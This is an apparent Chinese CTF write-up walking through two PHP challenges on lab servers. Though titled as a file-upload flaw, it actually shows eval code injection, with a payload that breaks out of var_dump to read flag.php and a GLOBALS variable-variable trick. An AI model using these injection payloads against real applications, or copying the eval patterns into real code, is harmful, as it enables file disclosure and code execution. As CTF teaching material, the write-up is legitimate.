1. 程式人生 > >典型的檔案上傳漏洞

典型的檔案上傳漏洞

案例一
URL:http://120.24.86.145:8003/
程式碼

<?php 
include "waf.php"; 
include "flag.php"; 
$a = @$_REQUEST['hello']; 
eval( "var_dump($a);"); 
show_source(__FILE__); ?>

其實就是拼接eval
可構造如下語句:

1);print_r(file(flag.php));//

到了程式碼裡就是

eval( "var_dump(1);print_r(file(flag.php));//);"); 

案例二

URL:

http://120.24.86.145:8004/index1.php

 

flag In the variable ! <?php  


error_reporting(0);// 關閉php錯誤顯示
include "flag1.php";// 引入flag1.php檔案程式碼
highlight_file(__file__);
if(isset($_GET['args'])){// 通過get方式傳遞 args變數才能執行if裡面的程式碼
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){// 這個正則表示式的意思是匹配任意 [A-Za-z0-9_] 的字元,就是任意大小寫字母和0到9以及下劃線組成
        die("args error!");
    }
    eval("var_dump($$args);");// 這邊告訴我們這題是程式碼審計的題目
}
?>

 

這個可以注意一下eval很明顯$$.首先他說如果不符合那個正則就die。\w的意思是所有的字母。也就是說$args必須要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");